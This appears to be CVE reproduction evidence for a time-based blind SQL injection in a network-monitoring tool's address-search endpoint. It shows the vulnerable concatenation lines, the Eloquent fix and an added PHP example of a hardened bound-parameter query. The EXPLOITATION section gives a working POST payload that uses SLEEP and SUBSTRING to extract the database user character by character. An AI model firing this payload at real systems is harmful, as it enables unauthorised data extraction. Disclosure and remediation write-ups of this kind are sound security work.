CVE-2026-26990 Reproduction Evidence
=====================================

VULNERABILITY: Time-Based Blind SQL Injection
FILE: includes/html/table/address-search.inc.php
AFFECTED VERSIONS: < 26.2.0
FIXED VERSION: 26.2.0

VULNERABLE CODE:
----------------
Line 34: $sql .= " AND ipv4_prefixlen='$prefix'";
Line 52: $sql .= " AND ipv6_prefixlen = '$prefix'";

The $prefix variable is extracted from user input via the 'address' parameter
by splitting on the '/' character. The prefix value is then directly
concatenated into the SQL query without sanitization or parameter binding.

EXPLOITATION:
-------------
POST /ajax_table.php
Parameters:
  - id=address-search
  - search_type=ipv4
  - address=127.0.0.1/aa' AND (SELECT 1 FROM (SELECT IF(ASCII(SUBSTRING((SELECT CURRENT_USER()),1,1))=[CHAR],SLEEP(1.5),0))x) AND '1'='1

The injection point is after the '/' in the address parameter. Time-based
blind SQL extraction is possible by measuring response times.

FIX:
----
The fix replaced the procedural code with Laravel controllers using Eloquent
ORM with proper parameter binding:

  if (isset($cidr)) {
      $q->where($this->cidrField, $cidr);
  }

This uses prepared statements with bound parameters.
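
ADDED EXAMPLE (not part of the original evidence and not LibreNMS code): the concatenation pattern from lines 34/52 next to a bound-parameter query that also validates the prefix length. It uses plain PDO with an in-memory SQLite database as a stand-in for the Eloquent binding shown in the fix; the table name, the ipv4_address column, the function names and the sample rows are assumptions constructed for illustration.

```php
<?php
// Added illustration, not LibreNMS code. Table layout, function names and
// sample rows are constructed; requires the pdo_sqlite extension.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE ipv4_addresses (ipv4_address TEXT, ipv4_prefixlen INTEGER)");
$db->exec("INSERT INTO ipv4_addresses VALUES ('127.0.0.1', 8), ('10.0.0.5', 24)");

// Vulnerable pattern: whatever follows '/' is pasted inside the SQL string literal.
function buildConcatenated(string $input): string
{
    [$address, $prefix] = array_pad(explode('/', $input, 2), 2, '');
    return "SELECT COUNT(*) FROM ipv4_addresses WHERE ipv4_address='$address'"
         . " AND ipv4_prefixlen='$prefix'";
}

// Hardened pattern: validate the prefix as an integer, then bind every value.
function searchBound(PDO $db, string $input): int
{
    [$address, $prefix] = array_pad(explode('/', $input, 2), 2, null);
    $sql = 'SELECT COUNT(*) FROM ipv4_addresses WHERE ipv4_address = :addr';
    $len = null;
    if ($prefix !== null) {
        // An IPv4 prefix length is an integer in 0..32; reject everything else.
        $len = filter_var($prefix, FILTER_VALIDATE_INT,
            ['options' => ['min_range' => 0, 'max_range' => 32]]);
        if ($len === false) {
            throw new InvalidArgumentException('invalid IPv4 prefix length');
        }
        $sql .= ' AND ipv4_prefixlen = :len';
    }
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':addr', $address, PDO::PARAM_STR);
    if ($len !== null) {
        $stmt->bindValue(':len', $len, PDO::PARAM_INT);
    }
    $stmt->execute();
    return (int) $stmt->fetchColumn();
}

// Constructed input: the quote/suffix shape from the evidence, without the subquery.
$hostile = "127.0.0.1/aa' AND '1'='1";
echo buildConcatenated($hostile), PHP_EOL;      // shows the literal being closed early
echo searchBound($db, '127.0.0.1/8'), PHP_EOL;  // well-formed input, bound query
try {
    searchBound($db, $hostile);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

Binding alone keeps the value out of the SQL grammar; the range check additionally turns malformed prefixes into an explicit error that can be logged and alerted on.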